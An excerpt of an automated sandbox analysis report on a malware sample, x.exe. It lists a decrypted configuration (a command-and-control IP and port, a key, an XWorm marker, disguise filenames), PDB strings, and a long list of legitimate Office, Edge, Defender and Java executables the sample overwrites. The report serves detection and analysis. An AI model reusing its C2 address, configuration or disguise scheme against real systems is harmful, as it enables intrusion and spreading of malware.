Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE | Joe Sandbox ML: detected
                              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                              Source: x.exeJoe Sandbox ML: detected
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: 45.141.26.232
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: 6666
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: <123456789>
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: <Xwormmm>
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: X
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: USB.exe
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: %ProgramData%
Source: 2.2.x.exe.30cf840.1.raw.unpack | String decryptor: Java Update Checker (64 bit).exe
Source: x.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb | source: pwahelper.exe.0.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdb | source: cookie_exporter.exe.0.dr
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb | source: armsvc.exe.0.dr
Source: Binary string: mpextms.pdb | source: mpextms.exe0.0.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb | source: OSPPREARM.EXE.3.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdbOGP | source: identity_helper.exe.0.dr
Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb | source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb | source: DW20.EXE.0.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb | source: msedge_proxy.exe.3.dr
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdbr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S | source: AppSharingHookController64.exe.3.dr
Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection64.pdb | source: Common.DBConnection64.exe.0.dr
Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdb | source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb | source: MicrosoftEdgeUpdate.exe.0.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP | source: msedge_proxy.exe.3.dr
Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb | source: Microsoft.Mashup.Container.Loader.exe.3.dr
Source: Binary string: GoogleCrashHandler64_unsigned.pdb | source: GoogleCrashHandler64.exe.0.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdb | source: msedge_pwa_launcher.exe.0.dr
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb | source: Aut2exe.exe.0.dr
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb | source: AdobeARMHelper.exe.0.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb | source: integrator.exe.0.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 | source: unpack200.exe.0.dr
Source: Binary string: r.pdb | source: AppSharingHookController64.exe.3.dr
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdb | source: AppSharingHookController64.exe.3.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S | source: integrator.exe.0.dr
Source: Binary string: VSTOInstaller.pdb | source: VSTOInstaller.exe.0.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdblper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S | source: SDXHelper.exe.3.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdbOGP | source: cookie_exporter.exe.0.dr
Source: Binary string: D:\a\_work\1\s\src\ai\windows\dll\x64\Release\aimgr.pdb | source: aimgr.exe.3.dr
Source: Binary string: AppVDllSurrogate32.pdb | source: AppVDllSurrogate.exe.3.dr
Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdbh | source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
Source: Binary string: MpCmdRun.pdbGCTL | source: MpCmdRun.exe0.0.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdbOGP | source: msedge_pwa_launcher.exe.0.dr
Source: Binary string: AppVDllSurrogate32.pdbGCTL | source: AppVDllSurrogate.exe.3.dr
Source: Binary string: MpCmdRun.pdb | source: MpCmdRun.exe0.0.dr
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr | source: AdobeARMHelper.exe.0.dr
Source: Binary string: GoogleCrashHandler64_unsigned.pdbl | source: GoogleCrashHandler64.exe.0.dr
Source: Binary string: MpDlpCmd.pdbGCTL | source: MpDlpCmd.exe.0.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb | source: WINWORD.EXE.0.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S | source: WINWORD.EXE.0.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 | source: ssvagent.exe.0.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb | source: ssvagent.exe.0.dr
Source: Binary string: lper.pdb | source: SDXHelper.exe.3.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S | source: OSPPREARM.EXE.3.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP | source: pwahelper.exe.0.dr
Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb | source: DATABASECOMPARE.EXE.0.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdb | source: identity_helper.exe.0.dr
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\mini_installer.exe.pdb | source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdb | source: SDXHelper.exe.3.dr
Source: Binary string: MpDlpCmd.pdb | source: MpDlpCmd.exe.0.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S | source: DW20.EXE.0.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb | source: unpack200.exe.0.dr
Source: Binary string: mpextms.pdbGCTL | source: mpextms.exe0.0.dr
Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb.. | source: Microsoft.Mashup.Container.Loader.exe.3.dr

Spreading

Source: Yara match | File source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Config\Jump to behavior
